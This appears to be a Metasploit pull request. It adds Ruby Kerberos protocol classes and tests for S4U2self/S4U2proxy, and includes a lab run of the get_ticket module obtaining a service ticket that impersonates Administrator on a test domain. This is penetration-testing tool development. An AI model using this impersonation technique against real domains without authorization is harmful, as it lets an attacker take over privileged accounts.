+            Rex::Proto::Kerberos::Model::PrincipalName.decode(input.value[0])
+          end
+
+          # Decodes the user_realm field
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [String]
+          def decode_user_realm(input)
+            input.value[0].value
+          end
+
+          # Decodes the cksum field
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [Rex::Proto::Kerberos::Model::PrincipalName]
+          #def decode_cksum(input)
+          #  Rex::Proto::Kerberos::Model::Checksum.decode(input.value[0])
+          #end
+
+          # Decodes the auth_package field
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [String]
+          def decode_auth_package(input)
+            input.value[0].value
+          end
+
+        end
+      end
+    end
+  end
+end
+

--- a/lib/rex/proto/kerberos/model/pre_auth_for_user.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_for_user.rb
@@ -111,8 +111,8 @@ module Rex
                 self.user_name = decode_user_name(val)
               when 1
                 self.user_realm = decode_user_realm(val)
-              #when 2
-              #  self.cksum = decode_cksum(val)
+              when 2
+                self.cksum = decode_cksum(val)
               when 3
                 self.auth_package = decode_auth_package(val)
               else
@@ -125,7 +125,7 @@ module Rex
           #
           # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
           # @return [Rex::Proto::Kerberos::Model::PrincipalName]
-          def decode_cname(input)
+          def decode_user_name(input)
             Rex::Proto::Kerberos::Model::PrincipalName.decode(input.value[0])
           end
 
@@ -141,9 +141,9 @@ module Rex
           #
           # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
           # @return [Rex::Proto::Kerberos::Model::PrincipalName]
-          #def decode_cksum(input)
-          #  Rex::Proto::Kerberos::Model::Checksum.decode(input.value[0])
-          #end
+          def decode_cksum(input)
+            Rex::Proto::Kerberos::Model::Checksum.decode(input.value[0])
+          end
 
           # Decodes the auth_package field
           #

--- a/lib/rex/proto/kerberos/model/pre_auth_pac_options.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_pac_options.rb
@@ -1,0 +1,98 @@
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class is a representation of a PA-PAC-OPTIONS, which specifies
+        # explicitly requested options in the PAC as defined in
+        # https://learn.microsoft.com/fr-fr/openspecs/windows_protocols/ms-kile/99721a01-c859-48d1-8310-ec1bab9b2838
+        # and
+        # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/aeecfd82-a5e4-474c-92ab-8df9022cf955
+        class PreAuthPacOptions < Element
+
+          # @!attribute flags
+          #   @return [Integer] The PA-PAC-OPTIONS flags
+          attr_accessor :flags
+
+          # Decodes the Rex::Proto::Kerberos::Model::PreAuthPacOptions from an input
+          #
+          # @param input [String, OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [self] if decoding succeeds
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::ASN1Data
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode PreAuthPacOptions, invalid input'
+            end
+
+            self
+          end
+
+          # Encodes the Rex::Proto::Kerberos::Model::PreAuthPacOptions into an ASN.1 String
+          #
+          # @return [String]
+          def encode
+            elems = []
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_flags], 0, :CONTEXT_SPECIFIC)
+
+            seq = OpenSSL::ASN1::Sequence.new(elems)
+
+            seq.to_der
+          end
+
+          # Encodes the flags
+          #
+          # @return [OpenSSL::ASN1::BitString]
+          def encode_flags
+            OpenSSL::ASN1::BitString.new([flags.to_i].pack('N'))
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::PreAuthPacOptions from an String
+          #
+          # @param input [String] the input to decode from
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+
+            decode_asn1(asn1)
+          rescue OpenSSL::ASN1::ASN1Error
+            raise Rex::Proto::Kerberos::Model::Error::KerberosDecodingError
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::PreAuthPacOptions from an
+          # OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode_asn1(input)
+            seq_values = input.value
+
+            seq_values.each do |val|
+              case val.tag
+              when 0
+                self.options = decode_flags(val)
+              else
+                raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode PreAuthPacOptions SEQUENCE'
+              end
+            end
+          end
+
+          # Decodes the flags field
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [Integer]
+          def decode_flags(input)
+            input.value[0].value.unpack('N')[0]
+          end
+
+
+
+        end
+      end
+    end
+  end
+end
+

--- a/lib/rex/proto/kerberos/model/pre_auth_pac_options_flags.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_pac_options_flags.rb
@@ -1,0 +1,22 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # THe PA-PAC-OPTIONS KerberosFlags are represented as a bit string.
+        # This module associates the human readable name, to the index the flag value is found at within the bit string.
+        # https://www.rfc-editor.org/rfc/rfc4120.txt - KDCOptions      ::= KerberosFlags
+        module PreAuthPacOptionsFlags
+          # [MS-KILE] 2.2.10
+          CLAIMS = 0
+          BRANCH_AWARE = 1
+          FORWARD_TO_FULL_DC = 2
+          # [MS-SFU] 2.2.5
+          RESOURCE_BASED_CONSTRAINED_DELEGATION = 3
+        end
+
+      end
+    end
+  end
+end

--- a/lib/rex/proto/kerberos/model/pre_auth_pac_options_flags.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_pac_options_flags.rb
@@ -7,7 +7,7 @@ module Rex
         # THe PA-PAC-OPTIONS KerberosFlags are represented as a bit string.
         # This module associates the human readable name, to the index the flag value is found at within the bit string.
         # https://www.rfc-editor.org/rfc/rfc4120.txt - KDCOptions      ::= KerberosFlags
-        module PreAuthPacOptionsFlags
+        class PreAuthPacOptionsFlags < KerberosFlags
           # [MS-KILE] 2.2.10
           CLAIMS = 0
           BRANCH_AWARE = 1

--- a/spec/lib/rex/proto/kerberos/model/checksum_spec.rb
+++ b/spec/lib/rex/proto/kerberos/model/checksum_spec.rb
@@ -22,4 +22,15 @@ RSpec.describe Rex::Proto::Kerberos::Model::Checksum do
       expect(checksum.encode).to eq(sample)
     end
   end
+
+  describe "#decode" do
+    it "decodes Rex::Proto::Kerberos::Model::Checksum correctly" do
+      encoded_checksum = "\x30\x1a\xa0\x04\x02\x02\xff\x76\xa1\x12\x04\x10\xea\x62\x48\xe2\x8c\xe0\x76\x47\x06\xc7\x39\x99\x06\x35\x96\x89"
+      expected_type = Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
+      expected_checksum = "\xea\x62\x48\xe2\x8c\xe0\x76\x47\x06\xc7\x39\x99\x06\x35\x96\x89"
+      checksum.decode(encoded_checksum)
+      expect(checksum.type).to eq(expected_type)
+      expect(checksum.checksum).to eq(expected_checksum)
+    end
+  end
 end

--- a/spec/lib/rex/proto/kerberos/model/pre_auth_for_user_spec.rb
+++ b/spec/lib/rex/proto/kerberos/model/pre_auth_for_user_spec.rb
@@ -1,0 +1,95 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+RSpec.describe Rex::Proto::Kerberos::Model::PreAuthForUser do
+
+  subject(:pre_auth_for_user) do
+    described_class.new
+  end
+
+=begin
+#<OpenSSL::ASN1::Sequence:0x00007fbb48be6f30
+ @indefinite_length=false,
+ @tag=16,
+ @tag_class=:UNIVERSAL,
+ @tagging=nil,
+ @value=
+  [#<OpenSSL::ASN1::ASN1Data:0x00007fbb2fd24e10
+    @indefinite_length=false,
+    @tag=0,
+    @tag_class=:CONTEXT_SPECIFIC,
+    @value=["0\x18\xA0\x03\x02\x01\x01\xA1\x110\x0F\e\rAdministrator"]>,
+   #<OpenSSL::ASN1::ASN1Data:0x00007fbb2dc0ab08
+    @indefinite_length=false,
+    @tag=1,
+    @tag_class=:CONTEXT_SPECIFIC,
+    @value=
+     [#<OpenSSL::ASN1::GeneralString:0x00007fbb7cf94040
+       @indefinite_length=false,
+       @tag=27,
+       @tag_class=:UNIVERSAL,
+       @tagging=nil,
+       @value="MYLAB.LOCAL">]>,
+   #<OpenSSL::ASN1::ASN1Data:0x00007fbb2fee42c8
+    @indefinite_length=false,
+    @tag=2,
+    @tag_class=:CONTEXT_SPECIFIC,
+    @value=
+     ["0\x1A\xA0\x04\x02\x02\xFFv\xA1\x12\x04\x10\x04o\f\xFE\x85EJ|\xFB\xDE\xA0k\xD3\xC7_\xDD"]>,
+   #<OpenSSL::ASN1::ASN1Data:0x00007fbb39c59cb0
+    @indefinite_length=false,
+    @tag=3,
+    @tag_class=:CONTEXT_SPECIFIC,
+    @value=
+     [#<OpenSSL::ASN1::GeneralString:0x00007fbb39c5af20
+       @indefinite_length=false,
+       @tag=27,
+       @tag_class=:UNIVERSAL,
+       @tagging=nil,
+       @value="Kerberos">]>]>
+=end
+  let(:sample) do
+    "\x30\x55\xa0\x1a\x30\x18\xa0\x03\x02\x01\x01\xa1\x11\x30\x0f\x1b" +
+    "\x0d\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\xa1\x0d" +
+    "\x1b\x0b\x4d\x59\x4c\x41\x42\x2e\x4c\x4f\x43\x41\x4c\xa2\x1c\x30" +
+    "\x1a\xa0\x04\x02\x02\xff\x76\xa1\x12\x04\x10\x04\x6f\x0c\xfe\x85" +
+    "\x45\x4a\x7c\xfb\xde\xa0\x6b\xd3\xc7\x5f\xdd\xa3\x0a\x1b\x08\x4b" +
+    "\x65\x72\x62\x65\x72\x6f\x73"
+  end
+
+  describe "#decode" do
+    it "returns the decoded Rex::Proto::Kerberos::Model::PreAuthForUser" do
+      expect(pre_auth_for_user.decode(sample)).to eq(pre_auth_for_user)
+    end
+
+    it "decodes user_name" do
+      pre_auth_for_user.decode(sample)
+      expect(pre_auth_for_user.user_name.name_type).to eq(Rex::Proto::Kerberos::Model::NameType::NT_PRINCIPAL)
+      expect(pre_auth_for_user.user_name.name_string).to eq(['Administrator'])
+    end
+
+    it "decodes user_realm" do
+      pre_auth_for_user.decode(sample)
+      expect(pre_auth_for_user.user_realm).to eq('MYLAB.LOCAL')
+    end
+
+    it "decodes cksum" do
+      pre_auth_for_user.decode(sample)
+      expect(pre_auth_for_user.cksum.type).to eq(Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5)
+      expect(pre_auth_for_user.cksum.checksum).to eq("\x04\x6f\x0c\xfe\x85\x45\x4a\x7c\xfb\xde\xa0\x6b\xd3\xc7\x5f\xdd")
+    end
+
+    it "decodes auth_package" do
+      pre_auth_for_user.decode(sample)
+      expect(pre_auth_for_user.auth_package).to eq('Kerberos')
+    end
+  end
+
+  describe "#encode" do
+    it "encodes Rex::Proto::Kerberos::Model::PreAuthForUser correctly" do
+      pre_auth_for_user.decode(sample)
+      expect(pre_auth_for_user.encode).to eq(sample)
+    end
+  end
+
+end


### PR DESCRIPTION
This PR does two things:
- Add support to [S4U2self](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13) and [S4U2proxy](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/bde93b0e-f3c9-4ddf-9f44-e1453be7af5a) to make it possible to impersonate a user using the `get_ticket` module.
- Move all the logic from the `get_ticket` module to the `lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb` library.

Moving most of the code to this library was necessary to avoid code duplication and to make it accessible to other modules (like this [one](https://github.com/rapid7/metasploit-framework/pull/17066) soon).

I'll try to add some specs for the new Kerberos model classes.


## Verification
Follow the same verification steps from https://github.com/rapid7/metasploit-framework/pull/17226 to make sure the module still works without impersonation.

Set the `IMPERSONATE` option to the username to impersonate, use the `GET_TGS` action and make sure the TGS ticket impersonates this user correctly.

For this to work, make sure S4U2self (Protocol Transition) constrained delegation on the account is set with the requested SPN. In this example, `ServiceA` has S4U2self constrained delegation set with `cifs/dc02.mylab.local`

<img width="411" alt="Screenshot 2022-12-01 at 21 10 17" src="https://user-images.githubusercontent.com/56716719/205151363-fbad70ae-6ab3-4f4a-85b7-052a172cd687.png">

## Scenarios
TGS for the `ServiceA` account, impersonating the `Administrator` account
```
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24

[*] 10.0.0.24:88 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)
[+] 10.0.0.24:88 - Received a valid TGT-Response
[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] 10.0.0.24:88 - Received a valid TGS-Response
[+] 10.0.0.24:88 - Received a valid TGS-Response
[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > loot

Loot
====

host             service  type                 name  content                   info                                                                             path
----             -------  ----                 ----  -------                   ----                                                                             ----
10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea          /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
```

Checking the ticket with Impacket's ccache:
```
❯ KRB5CCNAME=/home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin klist -v
Credentials cache: FILE:/home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
        Principal: Administrator@MYLAB.LOCAL
    Cache version: 4

Server: cifs/dc02.mylab.local@MYLAB.LOCAL
Client: Administrator@MYLAB.LOCAL
Ticket etype: aes256-cts-hmac-sha1-96, kvno 4
Session key: arcfour-hmac-md5
Ticket length: 1304
Auth time:  Dec  1 21:02:11 2022
End time:   Dec  2 07:02:11 2022
Renew till: Dec  2 21:02:11 2022
Ticket flags: enc-pa-rep, ok-as-delegate, pre-authent, renewable, forwardable
Addresses: addressless
```